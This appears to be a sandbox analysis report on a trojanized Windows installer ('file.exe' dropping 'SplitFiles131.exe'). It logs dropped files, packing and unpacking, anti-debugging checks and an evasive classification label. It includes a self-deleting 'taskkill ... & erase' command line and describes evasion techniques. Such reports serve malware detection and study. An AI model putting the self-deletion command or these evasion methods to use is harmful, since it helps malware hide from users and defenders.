                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00403548 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00446194 appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00445EC4 appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 004037CC appears 193 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 0043477C appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00455D54 appears 48 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00407988 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00455B64 appears 86 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00451DE8 appears 62 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: String function: 00405A9C appears 92 times
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00423C4C NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004126A0 NtdllDefWindowProc_A,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
                Source: is-EPSRP.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-EPSRP.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-EPSRP.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-5V8K4.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-5V8K4.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
                Source: is-5V8K4.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: file.exe, 00000000.00000000.295778835.0000000000417000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename" vs file.exe
                Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilename" vs file.exe
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Split Files\is-5V8K4.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                Source: SplitFiles131.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB84E70,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB84E70,
                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SplitFiles131.exe")
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-GA371.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winEXE@12/39@0/5
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004547A0 GetModuleHandleA,6D715550,GetDiskFreeSpaceA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0040B090 FindResourceA,FreeResource,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpFile created: C:\Program Files (x86)\Split FilesJump to behavior
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: `a}{
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: MFE.
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: ZK]Z
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCommand line argument: ZK]Z
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpWindow found: window name: TMainForm
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: file.exeStatic file information: File size 1970815 > 1048576

                Data Obfuscation

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack
                Detected unpacking (changes PE section rights)
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406594 push 004065D1h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404159 push eax; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404229 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042AA push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404327 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408BDC push 00408C0Fh; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040438C push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407F3C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00409A20 push 00409A5Dh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0040A107 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004302D0 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004063C0 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004785C8 push 00478673h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00410798 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004129F0 push 00412A53h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045AA9C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00450EB4 push 00450EE7h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0040D0F0 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00443530 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004055BD push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0040F650 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0040568D push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0040570E push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004057F0 push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0040578B push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00479B20 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00419CF0 push ecx; mov dword ptr [esp], ecx
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004311AD push esi; ret
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F4BB push ecx; ret
                Source: SplitFiles131.exe.1.drStatic PE information: section name: .ave131
                Source: initial sampleStatic PE information: section name: .text entropy: 7.241012836973415
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpFile created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpFile created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpFile created: C:\Program Files (x86)\Split Files\SplitFiles131.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpFile created: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpFile created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpFile created: C:\Program Files (x86)\Split Files\is-5V8K4.tmpJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0042425C IsIconic,SetActiveWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_004242A4 IsIconic,SetActiveWindow,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00417660 IsIconic,GetCapture,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00417D96 IsIconic,SetWindowPos,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpDropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpDropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-5V8K4.tmpJump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045157C FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0048AC5C FindFirstFileA,6D7169D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
                Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.376486762.000000000164B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0042041F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F789 SetUnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: 1_2_00459734 GetVersion,GetModuleHandleA,6D715550,6D715550,6D715550,AllocateAndInitializeSid,LocalFree,
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmpCode function: GetLocaleInfoA,
